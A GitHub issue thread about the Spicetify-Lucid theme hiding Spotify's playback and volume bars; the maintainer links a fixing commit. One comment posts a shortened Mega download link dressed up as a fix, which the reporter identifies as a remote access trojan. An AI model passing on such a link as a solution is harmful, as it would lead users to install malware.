### ISSUE TITLE
No playbar

### ISSUE THREAD

**Issue by lechatdeschats** [sanoojes/Spicetify-Lucid#60]
### Do you have the latest versions of Spicetify, Spotify and Lucid?

- [X] I'm using the latest versions of Spicetify, Spotify and Lucid

### Is there already an issue for your problem?

- [X] I have checked older issues, open and closed

### Is your problem definitely caused by the theme?

- [X] I have checked the app behavior without the theme and it is different

### Environment & Computer Info

```Markdown
- Spotify version: 1.2.42.290.g242057a2
- Installed from: Windows Store
- Spicetify version: v2.38.3
- Color scheme: Dark
- Extensions: none
- Custom apps: SpotX
- Lucid installation method: Spicetify Marketplace
```

### Description

the playback bar and the sound adjustment bar are invisible

### Screenshots

![image](https://github.com/user-attachments/assets/21055a48-85bc-40c6-b294-d93939cc03ca)

**Comment by Aljallaf100** [comment]
download
https://bit.ly/4evXrQ6:https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw

you may need to install the c compiler

**Comment by lechatdeschats** [comment]
no fix it's rat

**Comment by sanoojes** [comment]
sorry i fixed it on https://github.com/sanoojes/Spicetify-Lucid/commit/96c44cad6a4e58def8e86119787e836df07031ba

**Comment by sanoojes** [comment]
> download https://bit.ly/4evXrQ6:https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
> 
> you may need to install the c compiler

bro wtf
